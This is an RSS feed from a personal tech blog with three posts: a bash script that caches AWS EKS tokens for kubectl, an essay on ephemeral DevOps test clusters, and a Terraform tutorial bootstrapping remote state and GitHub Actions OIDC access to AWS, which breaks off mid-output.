<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[FeaX's Blog]]></title><description><![CDATA[Tech, Kubernetes, 3D printing, etc.]]></description><link>https://fe.ax/</link><image><url>https://fe.ax/favicon.png</url><title>FeaX&apos;s Blog</title><link>https://fe.ax/</link></image><generator>Ghost 5.88</generator><lastBuildDate>Fri, 10 Apr 2026 14:39:13 GMT</lastBuildDate><atom:link href="https://fe.ax/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Speed up kubectl commands (and k9s) when using AWS]]></title><description><![CDATA[<p>AWS runs the AWS-CLI every time  you run a command using kubectl. It&apos;s in your kubeconfig file. I started to notice it and came up with this script to bypass the slow AWS CLI.</p><pre><code class="language-shell">#!/usr/bin/env bash
set -euo pipefail

# Build an array of non-flag arguments by</code></pre>]]></description><link>https://fe.ax/speed-up-kubectl-commands-and-k9s-when-using-aws/</link><guid isPermaLink="false">67a2325fefe9750063746034</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Tue, 04 Feb 2025 15:31:45 GMT</pubDate><content:encoded><![CDATA[<p>AWS runs the AWS-CLI every time  you run a command using kubectl. It&apos;s in your kubeconfig file. I started to notice it and came up with this script to bypass the slow AWS CLI.</p><pre><code class="language-shell">#!/usr/bin/env bash
set -euo pipefail

# Build an array of non-flag arguments by iterating over all arguments.
# For any argument starting with &quot;--&quot; that does NOT include &quot;=&quot;,
# skip that argument and (if available) its immediate next value.
args=(&quot;$@&quot;)
nonflag_args=()
i=0
while [ $i -lt &quot;${#args[@]}&quot; ]; do
    arg=&quot;${args[$i]}&quot;
    if [[ &quot;$arg&quot; == --* ]]; then
        # If the flag is provided in the form &quot;--flag=value&quot;, treat it as one argument.
        if [[ &quot;$arg&quot; != *=* ]]; then
            # Skip this flag and its following value (if any).
            i=$((i+2))
            continue
        fi
    else
        nonflag_args+=(&quot;$arg&quot;)
    fi
    i=$((i+1))
done

# Check if the first two non-flag arguments are &quot;eks&quot; and &quot;get-token&quot;.
if [[ &quot;${nonflag_args[0]:-}&quot; != &quot;eks&quot; || &quot;${nonflag_args[1]:-}&quot; != &quot;get-token&quot; ]]; then
    exec aws &quot;$@&quot;
fi

# Extract the --cluster-name value from the arguments (supports both forms).
CLUSTER_NAME=&quot;&quot;
for (( i=0; i &lt; ${#args[@]}; i++ )); do
    case &quot;${args[$i]}&quot; in
        --cluster-name)
            if (( i+1 &lt; ${#args[@]} )); then
                CLUSTER_NAME=&quot;${args[$((i+1))]}&quot;
            fi
            ;;
        --cluster-name=*)
            CLUSTER_NAME=&quot;${args[$i]#--cluster-name=}&quot;
            ;;
    esac
done

if [[ -z &quot;$CLUSTER_NAME&quot; ]]; then
    echo &quot;Error: --cluster-name not provided.&quot; &gt;&amp;2
    exit 1
fi

# Set up the cache directory and file.
CACHE_DIR=&quot;${HOME}/.aws/kubetokencache&quot;
CACHE_FILE=&quot;${CACHE_DIR}/${CLUSTER_NAME}.json&quot;

# Check if a cached token exists and is valid for at least 30 seconds.
if [[ -f &quot;$CACHE_FILE&quot; ]]; then
    # Extract the expirationTimestamp using jq.
    EXPIRATION=$(jq -r &apos;.status.expirationTimestamp // empty&apos; &quot;$CACHE_FILE&quot;)
    if [[ -n &quot;$EXPIRATION&quot; ]]; then
        # Convert the expiration timestamp (ISO 8601) to epoch seconds.
        exp_epoch=$(date -d &quot;$EXPIRATION&quot; +%s 2&gt;/dev/null || date -j -f &quot;%Y-%m-%dT%H:%M:%SZ&quot; &quot;$EXPIRATION&quot; &quot;+%s&quot;)
        now_epoch=$(date +%s)
        # If the token remains valid for at least another 30 seconds, output the cached file.
        if (( exp_epoch - now_epoch &gt; 30 )); then
            cat &quot;$CACHE_FILE&quot;
            exit 0
        fi
    fi
fi

# No valid cached token found; run the actual AWS CLI command.
TOKEN_JSON=$(aws &quot;$@&quot;)

# Create the cache directory if it doesn&apos;t exist.
mkdir -p &quot;$CACHE_DIR&quot;

# Cache the new token.
echo &quot;$TOKEN_JSON&quot; &gt; &quot;$CACHE_FILE&quot;

# Output the token.
echo &quot;$TOKEN_JSON&quot;
</code></pre>]]></content:encoded></item><item><title><![CDATA[Isolating DevOps changes using ephemeral infra environments]]></title><description><![CDATA[This blog post describes DevOps' ephemeral environments, a way for DevOps to create safe environments to test changes to the cluster.]]></description><link>https://fe.ax/ephemeral-infra-environments/</link><guid isPermaLink="false">66a7f874e23876005ee37fe3</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Fri, 27 Sep 2024 20:56:04 GMT</pubDate><content:encoded><![CDATA[<p>Most companies have a production and testing environment for development. Both are used daily by developers and users. Platform or DevOps engineers often also use these test environments, and their work can break that environment due to faulty changes.  Some companies schedule these changes &quot;outside of working hours.&quot; Which is horrible for the people working on those changes.</p><p>For the application developers, it&apos;s normal to create a branch, write some code, and push it to git to be presented with an ephemeral environment&#x2014;an instance of the application made just in time for you.</p><p>In your application instance, you click around and make some API calls. All without interacting with the <em>production </em>environment because you&apos;re in the <em>test </em>environment. Your code is doing fine, but suddenly, API calls fail randomly or even stop responding altogether. After debugging for a few minutes, you figure out that someone in the DevOps team is also working on some changes, breaking the test cluster.</p><p>The Kubernetes ingress controller needs an update, and just like your own code, the changes don&apos;t always work immediately. Your colleagues next to you are all hitting the F5 button like there is no tomorrow. The Slack channel gets pinged: &quot;Cluster down??&quot;</p><p>This situation happens more than DevOps&apos;ers like to admit. Although you&apos;re testing it on the <em>test</em> cluster, it is <em>production</em> to the company. The solution is easy: yet another cluster, right? Prod, test, validation? Like a <em>DevOps test</em> cluster? If a <em>DevOps test</em> cluster exists, will only one person work on stuff?</p><p>What if I told you there was an elegant solution?</p><h2 id="the-idea">The idea</h2><p>Having DevOps&apos; ephemeral environments means you can create and destroy clusters whenever you&apos;re working on something as a DevOps&apos;er, just like the developers do. This creates a safe environment for you to experiment with and test changes to the infrastructure.</p><figure class="kg-card kg-image-card"><img src="https://fe.ax/content/images/2024/09/image-2.png" class="kg-image" alt loading="lazy" width="466" height="131"></figure><h3 id="test-is-a-production-cluster"><em>Test</em> is a production cluster</h3><p>When a cluster can&apos;t be deleted, it&apos;s production to someone, and that someone is affected when you kill it off or play around with it. This means that when the DevOps guy wrecks a test cluster that prevents anyone from working, you accidentally break a cluster that was production <strong>to you</strong>.</p><h3 id="hand-sculpting-a-beautifully-unstable-cluster">Hand-sculpting a beautifully unstable cluster</h3><p>When creating ephemeral clusters, it is important to reimagine how your production clusters exist. These clusters shouldn&apos;t be hand-sculpted masterpieces of art; instead, they should be easily copied or reproduced like printouts. Adding pieces to your infrastructure piece by piece can cause your blueprint to become unstable. When the time comes for you to rebuild your testing or production cluster, it will no longer be possible to build it up without taking hours to figure out what is wrong. Even worse, you aren&apos;t used to creating new clusters.</p><p>Then there is <a href="https://www.lastweekinaws.com/blog/clickops/">ClickOps&apos;ing</a> and Ninja&apos;ing, which create unpredictable behavior, something we don&apos;t want in production. There is no record of change, and nobody remembers what happened three days ago.</p><p>Therefore, it&apos;s essential to be able to spin up a replica of that production cluster whenever you need it and <strong>throw it away when you&apos;re heading home</strong>.</p><h2 id="cluster-generation-with-prs">Cluster generation with PRs</h2><p>When you start working on something&#x2014;an update to a controller, for example&#x2014;you should do this on a cluster that is as close to production as possible. Testing in production doesn&apos;t fly for infrastructure, so you need a copy. Let&apos;s take a look at the options:</p><ul><li>Production: Impacts customers</li><li>Testing: Impacts developer colleagues</li><li>Persistent validation: Impacts DevOps colleagues and is expensive</li><li>Ephemeral validation: Impacts only you</li></ul><p>Now, this isn&apos;t easily done. Converting your blueprint to roll out 2+n clusters will require changes. Your blueprints might also require manual steps like allocating external resources (active directory, cloud resources, names, etc.). However, the biggest problem you will probably have is reproducibility.</p><p>The most important aspect of using ephemeral cluster generation is having a reproducible cluster. Whenever a PR is opened for infra, the environment should be built up and destroyed automatically when it is closed. Manual interventions make starting up a new cluster annoying and should be avoided entirely. You don&apos;t want to write a guide on how this mechanism works because of the shortcuts you took. It should work without explanation.</p><h2 id="cluster-upgrade-testing">Cluster upgrade testing</h2><p>Having the ability to generate clusters brings another great feature. Upgrade tests mean that you&apos;re running a pipeline on your ephemeral environment, which:</p><ol><li>Destroys your cluster completely</li><li>Builds it back up from the main branch</li><li>Runs the test suite of the main branch to verify it&apos;s working correctly</li><li>Starts the upgrades of the cluster to your branch in one go</li><li>Runs the test suite of your branch</li></ol><p>Using such a workflow ensures that your changes will work on the clusters currently running the main branch.</p><p>The most obvious scenario for this is updating the cluster, whether it&apos;s something like Crossplane or Kubernetes itself.</p><h3 id="example-scenario">Example scenario</h3><p>You could run into dependency constraints whenever you&apos;re building a new feature. For example, Crossplane creates its CRDs, not through ArgoCD reading the Helm chart. This can work when you&apos;re slowly building your change:</p><ol><li>Add Crossplane to your setup<ol><li>Crossplane creates the Provider CRD</li></ol></li><li>You add the S3 AWS provider</li></ol><p>But what if you merge this as one run into production?</p><ol><li>ArgoCD adds Crossplane and the S3 AWS Provider to your setup<ol><li>ArgoCD fails to dry-run Helm because it doesn&apos;t know the Provider CRD</li></ol></li></ol><p>By running an upgrade test, you would have found this flaw early.</p><p>This is one of the most confidence-creating features of having DevOps&apos; ephemeral environments.</p><h2 id="cost-control">Cost control</h2><p>Running additional environments isn&apos;t free. When you&apos;re working on something, a complete extra cluster will be created, and you&apos;ll pay for the resources you use. It&apos;s essential to keep track of the costs of these environments.</p><h3 id="track-costs">Track costs</h3><p>If you&apos;re in AWS or any other cloud that uses the pay-per-minute model, you can put the resources in a separate group. This can be done using tags or separate accounts (which is also nice for security). Set budgets and notifications when running over your budget to ensure you don&apos;t run into a $10.000 bill just for some runaway controller creating hundreds of RDS databases.</p><h3 id="shut-down-the-environment">Shut down the environment</h3><p>The ability to start environments whenever you want also allows you to delete environments you&apos;re not currently working on. For example, when you&apos;re heading home every noon, you can shut down the environment to save costs. It takes time for your environment to become ready, so you will probably not shut it down for a bathroom break.</p><p>This also allows you to keep testing if your new changes will break cluster generation due to a circular dependency.</p><h3 id="disable-features">Disable features</h3><p>Some things are outside the cluster&apos;s operational scope. For example, our audit logs in CloudWatch made up half of the costs of our validation account.</p><p>You can also run all nodes on spot, which is good practice for your testing and production environment, too. It&apos;s free chaos engineering, but make sure the application keeps working. All of our nodes have a 24-hour expiration date, which continuously tests node disruptions.</p><p>Of course, you can do a lot more but prevent drifting away too much from production by using a different blueprint for validation.</p><h3 id="nuke-it">Nuke it</h3><p>Good practice can also be to clean up everything in your account. I use <a href="https://github.com/ekristen/aws-nuke">aws-nuke</a>&#xA0;for this. Every Friday evening, resources not explicitly excluded from the nuking process are removed from the AWS account. This ensures you don&apos;t have leftover resources from experiments.</p><h2 id="conclusion">Conclusion</h2><p>This is one of the most important technical things I&apos;ve learned at my job last year at Alliander. They have this flow in place, and it works great. Now, I&apos;ve implemented this flow at the company where I&apos;m currently working, Viya, and I&apos;m 100% in on this. I&apos;ll probably be writing about some technical stuff related to this workflow in the future.</p>]]></content:encoded></item><item><title><![CDATA[Bootstrapping Terraform GitHub Actions for AWS]]></title><description><![CDATA[Bootstrapping all Terraform required components to run and manage itself in GitHub Actions for AWS.]]></description><link>https://fe.ax/bootstrapping-tf-gha-for-aws/</link><guid isPermaLink="false">65abbc433d4c63005dfb2df8</guid><category><![CDATA[Terraform]]></category><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Sun, 21 Jan 2024 19:33:41 GMT</pubDate><media:content url="https://fe.ax/content/images/2024/01/DALL-E-2024-01-21-20.27.13---A-visually-engaging-and-illustrative-feature-image-for-a-blog-article-about-bootstrapping-Terraform-with-GitHub-Actions-for-AWS.-The-image-should-depi--1-.png" medium="image"/><content:encoded><![CDATA[<img src="https://fe.ax/content/images/2024/01/DALL-E-2024-01-21-20.27.13---A-visually-engaging-and-illustrative-feature-image-for-a-blog-article-about-bootstrapping-Terraform-with-GitHub-Actions-for-AWS.-The-image-should-depi--1-.png" alt="Bootstrapping Terraform GitHub Actions for AWS"><p>In a journey to eliminate all clickops, I want to automate the deployment of the core of my AWS infra with GitHub Actions. To do this, I need to create the IDP, IAM roles, the S3 bucket for the state, and the DynamoDB table for locking.</p><p>Terraform uses these, so it&apos;s a bit like the chicken and egg problem.</p><p>In this post, I will make Terraform manage its dependencies and connect GitHub Actions to AWS.</p><h2 id="bootstrapping-the-basics">Bootstrapping the basics</h2><p>Let&apos;s set up a skeleton for our Terraform configuration. The goal is to be able to:</p><ul><li>Create the requirements for a remote state from Terraform</li><li>Authenticate to AWS using OIDC</li><li>Run Terraform in GitHub Actions</li></ul><h3 id="creating-the-s3-and-dynamodb-terraform">Creating the S3 and DynamoDB Terraform</h3><p>Terraform uses S3 for its state and a DynamoDB table to prevent simultaneous runs. These do not exist already, and we <strong>don&apos;t want to create them by hand</strong>. This is why the first module I created in my AWS Core Terraform config repository is <code>remote-state</code>. This module has to be bootstrapped, and the state must eventually be migrated to the created S3 bucket.</p><p>This module is responsible for creating the needed resources and <strong>generating the <code>backend.tf</code> file.</strong></p><p>To set up the required components, I used the following Terraform code:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;random_id&quot; &quot;tfstate&quot; {
  byte_length = 8
}

resource &quot;aws_s3_bucket&quot; &quot;terraform_state&quot; {
  bucket = &quot;tfstate-${random_id.tfstate.hex}&quot;

  lifecycle {
    prevent_destroy = true
  }
}

resource &quot;aws_s3_bucket_versioning&quot; &quot;terraform_state&quot; {
  bucket = aws_s3_bucket.terraform_state.id

  versioning_configuration {
    status = &quot;Enabled&quot;
  }
}

resource &quot;aws_dynamodb_table&quot; &quot;terraform_state_lock&quot; {
  name         = &quot;app-state-${random_id.tfstate.hex}&quot;
  hash_key     = &quot;LockID&quot;
  billing_mode = &quot;PAY_PER_REQUEST&quot;

  attribute {
    name = &quot;LockID&quot;
    type = &quot;S&quot;
  }
}</code></pre><figcaption><p><span style="white-space: pre-wrap;">remote-state module</span></p></figcaption></figure><p>To make the bucket name unique, I created a random ID, which is eventually saved in the Terraform state and will not change on subsequent runs.</p><p>For the DynamoDB table, I&apos;ve set it up using <a href="https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/HowItWorks.ReadWriteCapacityMode.html#HowItWorks.OnDemand">PAY_PER_REQUEST</a> because Terraform will not use even one query per second, and provisioning anything will likely result in more costs.</p><p>The attribute we&apos;re setting is the LockID <a href="https://developer.hashicorp.com/terraform/language/settings/backends/s3#dynamodb-state-locking">which Terraform needs</a>.</p><p>Next, we need Terraform to create the <code>backend.tf</code> file after it creates its required components.</p><p>I created this short template as <code>state-backend.tftpl</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">terraform {
  backend &quot;s3&quot; {
    bucket         = &quot;${bucket}&quot;
    key            = &quot;states/terraform.tfstate&quot;
    encrypt        = true
    dynamodb_table = &quot;${dynamodb_table}&quot;
    region         = &quot;${region}&quot;
  }
}</code></pre><figcaption><p><span style="white-space: pre-wrap;">state-backend.tftpl</span></p></figcaption></figure><p>The <a href="https://developer.hashicorp.com/terraform/language/functions/templatefile">templatefile function</a> can template this template.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;local_sensitive_file&quot; &quot;foo&quot; {
  content = templatefile(&quot;${path.module}/state-backend.tftpl&quot;, {
    bucket         = aws_s3_bucket.terraform_state.id
    dynamodb_table = aws_dynamodb_table.terraform_state_lock.name
    region         = var.aws_region
  })
  filename = &quot;${path.module}/../../backend.tf&quot;
}</code></pre><figcaption><p><span style="white-space: pre-wrap;">templatefile function</span></p></figcaption></figure><p>You can find the complete Terraform code <a href="https://github.com/fe-ax/tf-aws/tree/main/terraform/modules/remote-state">here</a>.</p><h3 id="bootstrapping-the-remote-state">Bootstrapping the remote state</h3><p>When we run the remote-state module, we see that Terraform is creating everything as we&apos;d expect:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">~$ terraform apply -target module.remote-state

Terraform used the selected providers to generate the following execution plan. Resource actions are indicated with the following symbols:
  + create

Terraform will perform the following actions:

  # module.remote-state.aws_dynamodb_table.terraform_state_lock will be created
  + resource &quot;aws_dynamodb_table&quot; &quot;terraform_state_lock&quot; {
      + arn              = (known after apply)
      + billing_mode     = &quot;PAY_PER_REQUEST&quot;
      + hash_key         = &quot;LockID&quot;
      + id               = (known after apply)
      + name             = (known after apply)
      + read_capacity    = (known after apply)
      + stream_arn       = (known after apply)
      + stream_label     = (known after apply)
      + stream_view_type = (known after apply)
      + tags_all         = (known after apply)
      + write_capacity   = (known after apply)

      + attribute {
          + name = &quot;LockID&quot;
          + type = &quot;S&quot;
        }
    }

  # module.remote-state.aws_s3_bucket.terraform_state will be created
  + resource &quot;aws_s3_bucket&quot; &quot;terraform_state&quot; {
      + acceleration_status         = (known after apply)
      + acl                         = (known after apply)
      + arn                         = (known after apply)
      + bucket                      = (known after apply)
      + bucket_domain_name          = (known after apply)
      + bucket_regional_domain_name = (known after apply)
      + force_destroy               = true
      + hosted_zone_id              = (known after apply)
      + id                          = (known after apply)
      + object_lock_enabled         = (known after apply)
      + policy                      = (known after apply)
      + region                      = (known after apply)
      + request_payer               = (known after apply)
      + tags_all                    = (known after apply)
      + website_domain              = (known after apply)
      + website_endpoint            = (known after apply)
    }

  # module.remote-state.aws_s3_bucket_versioning.terraform_state will be created
  + resource &quot;aws_s3_bucket_versioning&quot; &quot;terraform_state&quot; {
      + bucket = (known after apply)
      + id     = (known after apply)

      + versioning_configuration {
          + mfa_delete = (known after apply)
          + status     = &quot;Enabled&quot;
        }
    }

  # module.remote-state.local_sensitive_file.foo will be created
  + resource &quot;local_sensitive_file&quot; &quot;foo&quot; {
      + content              = (sensitive value)
      + directory_permission = &quot;0700&quot;
      + file_permission      = &quot;0700&quot;
      + filename             = &quot;modules/remote-state/../../backend.tf&quot;
      + id                   = (known after apply)
    }

  # module.remote-state.random_id.tfstate will be created
  + resource &quot;random_id&quot; &quot;tfstate&quot; {
      + b64_std     = (known after apply)
      + b64_url     = (known after apply)
      + byte_length = 8
      + dec         = (known after apply)
      + hex         = (known after apply)
      + id          = (known after apply)
    }

Plan: 5 to add, 0 to change, 0 to destroy.</code></pre><figcaption><p><span style="white-space: pre-wrap;">Terraform apply</span></p></figcaption></figure><p>However, because we generated and placed the <code>backend.tf</code> file, we see a warning when running it the second time:</p><pre><code class="language-hcl">&#x2502; Error: Backend initialization required, please run &quot;terraform init&quot;
&#x2502; 
&#x2502; Reason: Initial configuration of the requested backend &quot;s3&quot;</code></pre><p>To migrate the local state to the just created S3 bucket, we can use the following command:</p><pre><code class="language-bash">~$ terraform init -migrate-state

Initializing the backend...
Do you want to copy existing state to the new backend?
  Pre-existing state was found while migrating the previous &quot;local&quot; backend to the newly configured &quot;s3&quot; backend. No existing state was found in the newly configured &quot;s3&quot; backend. Do you want to copy this state to the new &quot;s3&quot; backend?

  Enter &quot;yes&quot; to copy and &quot;no&quot; to start with an empty state.

  Enter a value: yes


Successfully configured the backend &quot;s3&quot;! Terraform will automatically
use this backend unless the backend configuration changes.
Initializing modules...

Initializing provider plugins...
- Reusing previous version of hashicorp/random from the dependency lock file
- Reusing previous version of hashicorp/local from the dependency lock file
- Reusing previous version of hashicorp/aws from the dependency lock file
- Using previously-installed hashicorp/random v3.6.0
- Using previously-installed hashicorp/local v2.2.2
- Using previously-installed hashicorp/aws v4.37.0

Terraform has been successfully initialized!</code></pre><p>After the migration, you should be able to rerun it without any expected changes:</p><pre><code class="language-bash">~$ terraform apply -target module.remote-state
module.remote-state.random_id.tfstate: Refreshing state... [id=_q9zfFjtnUQ]
module.remote-state.aws_dynamodb_table.terraform_state_lock: Refreshing state... [id=app-state-feaf737c58ed9d44]
module.remote-state.aws_s3_bucket.terraform_state: Refreshing state... [id=tfstate-feaf737c58ed9d44]
module.remote-state.aws_s3_bucket_versioning.terraform_state: Refreshing state... [id=tfstate-feaf737c58ed9d44]
module.remote-state.local_sensitive_file.foo: Refreshing state... [id=6a30000a63c0f6d2d5ef8be77cce05bdfc237df7]

No changes. Your infrastructure matches the configuration.

Terraform has compared your real infrastructure against your configuration and found no differences, so no changes are needed.</code></pre><p>We have a remote state which we can use in GitHub Actions now &#x1F389;</p><h2 id="setting-up-a-github-actions-pipeline-for-terraform">Setting up a GitHub Actions Pipeline for Terraform</h2><p>Although it might seem the wrong way around, I want to set up a Terraform pipeline before configuring the authentication from GitHub Actions to AWS. By having a broken pipeline, we can test the configuration we will build more easily.</p><p>To start using GitHub actions, we create a directory <code>.github/workflows</code> and place a yaml file there. You can find mine <a href="https://github.com/fe-ax/tf-aws/tree/main/.github/workflows">here</a>.</p><p>The workflow consists of two jobs: the <code>plan</code> job and the <code>apply</code> job. The hard requirements I have for this workflow are:</p><ol><li>Run the <code>plan</code> job on every commit</li><li>Merging is only available if the plan succeeds</li><li>Run the <code>apply</code> job only on the main branch</li><li>Run the <code>apply</code> job only if there are changes</li><li>Require manual approval for the <code>apply</code> job to run</li><li>No use of access keys</li><li>Account ID not visible</li></ol><p>Most of these are straightforward, and the comments in GitHub should explain enough. Some were more interesting.</p><h3 id="merging-is-only-available-if-the-plan-succeeds">Merging is only available if the plan succeeds</h3><p>It&apos;s good practice to prevent pushes to the main branch. You can block pushes by using <a href="https://docs.github.com/en/repositories/configuring-branches-and-merges-in-your-repository/managing-protected-branches/managing-a-branch-protection-rule">branch protection rules</a>. I chose to:</p><ol><li>Require a pull request before merging</li><li>Require conversation resolution before merging</li><li>Require linear history</li><li>Require deployments to succeed before merging</li><li>Do not allow bypassing the above settings</li></ol><p>The most relevant options selected are options 1 and 4. These ensure everything will be funneled through a pull request only if the workflow succeeds.</p><h3 id="run-the-apply-job-only-if-there-are-changes">Run the apply job only if there are changes</h3><p>When you change things like placing comments, it will not change the outcome of the terraform plan. In that case, we can skip the apply step.</p><p>The <a href="https://github.com/hashicorp/setup-terraform#:~:text=Subsequent%20steps%20can%20access%20outputs%20when%20the%20wrapper%20script%20is%20installed%3A">Terraform setup wrapper</a> sets a couple of outputs in GitHub Actions. The most interesting one for this requirement is the <code>steps.plan.outputs.exitcode</code>. This is set as an output in the <code>plan</code> job, and in the <code>apply</code> job, we can use it as a run condition.</p><figure class="kg-card kg-code-card"><pre><code class="language-yaml">  apply:
    runs-on: ubuntu-latest
    environment: production
    needs: plan
    if: |
      github.ref == &apos;refs/heads/main&apos; &amp;&amp;
      needs.plan.outputs.returncode == 2</code></pre><figcaption><p><span style="white-space: pre-wrap;">if using the main branch and changes are detected in the Terraform plan</span></p></figcaption></figure><h3 id="require-manual-approval-for-the-apply-job-to-run">Require manual approval for the <code>apply</code> job to run</h3><p>A few GitHub bot scripts/actions allow you to open issues and place &quot;LGTM!&quot; comments to approve the next step: apply. I disliked how you use comments to approve steps, although it can be marked up nicely if you prefer this way.</p><p>GitHub allows you to <a href="https://docs.github.com/en/actions/managing-workflow-runs/reviewing-deployments">review jobs</a> that are in specific environments. To enable this, you open the settings tab in your repository and select Environments. You can add new environments if they are not already created automatically here. I created <code>plan</code> and <code>apply</code>.</p><p>Once they are created, you can enable the option <code>Required reviewers</code> and add yourself to the reviewers&apos; list.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://fe.ax/content/images/2024/01/image.png" class="kg-image" alt="Bootstrapping Terraform GitHub Actions for AWS" loading="lazy" width="798" height="820" srcset="https://fe.ax/content/images/size/w600/2024/01/image.png 600w, https://fe.ax/content/images/2024/01/image.png 798w"><figcaption><span style="white-space: pre-wrap;">Configuring environments</span></figcaption></figure><h3 id="concluding-the-github-action-pipeline">Concluding the GitHub Action pipeline</h3><p>Now, we can run Terraform from GitHub actions and check the plan before we apply! &#x1F389;</p><p>We&apos;re also probably very happy to see the following error in the pipeline:</p><pre><code class="language-bash">Assuming role with OIDC
Error: Could not assume role with OIDC: No OpenIDConnect provider found in your account for https://token.actions.githubusercontent.com</code></pre><p>This means that not everyone can access our AWS account. Let&apos;s dive into establishing a trust relationship between AWS and GitHub Actions.</p><p>Terraform warns you that running <code>plan</code> and <code>apply</code> separately without writing a plan to file may change the actual <code>apply</code>. This is because when you don&apos;t write your plan to a file, you cannot be certain that by the time you approve your rollout to production, your AWS state will still be the same.</p><p>When you run the plan command with <code>-out</code>, you can make sure that the apply step only applies what you had planned if the state didn&apos;t change.</p><h2 id="trusting-the-github-repository-using-oidc">Trusting the GitHub repository using OIDC</h2><p>We must add an identity provider (IDP) to our AWS account to establish trust. This cannot be done from the GitHub actions we created because it has no access yet.</p><h3 id="adding-the-identity-provider-to-aws-using-terraform">Adding the identity provider to AWS using Terraform</h3><p>To create the IDP, we can always use the same Terraform code:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;aws_iam_openid_connect_provider&quot; &quot;default&quot; {
  url = &quot;https://token.actions.githubusercontent.com&quot;

  client_id_list = [
    &quot;sts.amazonaws.com&quot;,
  ]

  thumbprint_list = [&quot;1b511abead59c6ce207077c0bf0e0043b1382612&quot;]
}</code></pre><figcaption><p><span style="white-space: pre-wrap;">Identity provider in Terraform</span></p></figcaption></figure><p>I have followed <a href="https://aws.amazon.com/blogs/security/use-iam-roles-to-connect-github-actions-to-actions-in-aws/">this</a> guide and placed the IDP <a href="https://github.com/fe-ax/tf-aws/blob/main/terraform/01-idp.tf">here</a> for this part. This allows GitHub to assume roles when the role trusts GitHub. The thumbprint_list contains GitHub&apos;s thumbprint and will always be the same.</p><h3 id="creating-a-role-for-github-to-assume">Creating a role for Github to assume</h3><p>Creating roles with Terraform consists of a lot of lines of code. You can read the whole config <a href="https://github.com/fe-ax/tf-aws/blob/main/terraform/modules/roles/core.tf">here</a>. I will only discuss the trust policy here.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">data &quot;aws_iam_policy_document&quot; &quot;core_trusted_entities_policy_document&quot; {
  statement {
    actions = [&quot;sts:AssumeRoleWithWebIdentity&quot;]

    principals {
      type        = &quot;Federated&quot;
      identifiers = [var.oidc_id_github]
    }

    condition {
      test     = &quot;StringEquals&quot;
      variable = &quot;token.actions.githubusercontent.com:aud&quot;
      values   = [&quot;sts.amazonaws.com&quot;]
    }

    condition {
      test     = &quot;StringEquals&quot;
      variable = &quot;token.actions.githubusercontent.com:sub&quot;
      values = [
        &quot;repo:fe-ax/tf-aws:environment:plan&quot;,
        &quot;repo:fe-ax/tf-aws:environment:apply&quot;
      ]
    }
  }
}</code></pre><figcaption><p><span style="white-space: pre-wrap;">Trust policy for GHA</span></p></figcaption></figure><p>A trust policy always needs to select a principal, which is a federated principal, since we&apos;re linking to GitHub.</p><p>Next, we must add a condition allowing GitHub to send requests for the AWS STS (Security Token Service) service.</p><p>Finally, we specify which environments can access this role. I chose not to split up the read/write roles of the plan/apply jobs, but it would be good practice to do this. Using the condition &quot;StringEquals&quot; will check against exact matches in one of the following values.</p><h3 id="applying-the-configuration">Applying the configuration</h3><p>When everything is ready, we can locally run <code>terraform apply</code> to apply all the new additions and take the last step before running our GitHub Actions workflow successfully.</p><h3 id="testing-the-github-actions-workflow">Testing the GitHub Actions workflow</h3><p>The time has come to put everything to the test. First, push everything to a branch if you haven&apos;t already done so. Then, create a pull request from your branch to the main.</p><p>It should start running like this:</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://fe.ax/content/images/2024/01/image-2.png" class="kg-image" alt="Bootstrapping Terraform GitHub Actions for AWS" loading="lazy" width="938" height="440" srcset="https://fe.ax/content/images/size/w600/2024/01/image-2.png 600w, https://fe.ax/content/images/2024/01/image-2.png 938w"><figcaption><span style="white-space: pre-wrap;">Running actions blocking merge</span></figcaption></figure><p>Showing the merge is blocked until the run is complete. After a couple of seconds, it should show:</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://fe.ax/content/images/2024/01/image-3.png" class="kg-image" alt="Bootstrapping Terraform GitHub Actions for AWS" loading="lazy" width="938" height="385" srcset="https://fe.ax/content/images/size/w600/2024/01/image-3.png 600w, https://fe.ax/content/images/2024/01/image-3.png 938w"><figcaption><span style="white-space: pre-wrap;">Succeeded action allowing merge</span></figcaption></figure><p>Check your plan, followed by a squash and merge. Don&apos;t forget to delete the branch. Immediately after merging, another plan should start running, detecting changes and triggering the <code>apply</code> job. It should look like:</p><figure class="kg-card kg-image-card"><img src="https://fe.ax/content/images/2024/01/image-1.png" class="kg-image" alt="Bootstrapping Terraform GitHub Actions for AWS" loading="lazy" width="638" height="713" srcset="https://fe.ax/content/images/size/w600/2024/01/image-1.png 600w, https://fe.ax/content/images/2024/01/image-1.png 638w"></figure><p>Check the plan again, approve the deployment, and &#x1F389;GitHub Actions is managing its resources to be able to manage its resources!</p><h2 id="destroying-everything">Destroying everything</h2><p>If you want to destroy everything again, you must remove the <code>lifecycle_policy</code> first, or Terraform will tell you you can&apos;t destroy anything.</p><p>The best route is to delete the <code>backend.tf</code> file and migrate the remote state to your local machine. This is needed because Terraform will be destroying its S3 state and DynamoDB lock table, losing your state in the middle of a run.</p><figure class="kg-card kg-code-card"><pre><code class="language-bash">marco@DESKTOP-2RFLM66:~/tf-aws-iam/terraform$ rm backend.tf
marco@DESKTOP-2RFLM66:~/tf-aws-iam/terraform$ tf init -migrate-state

Initializing the backend...
Terraform has detected you&apos;re unconfiguring your previously set &quot;s3&quot; backend.
Do you want to copy existing state to the new backend?
  Pre-existing state was found while migrating the previous &quot;s3&quot; backend to the
  newly configured &quot;local&quot; backend. No existing state was found in the newly
  configured &quot;local&quot; backend. Do you want to copy this state to the new &quot;local&quot;
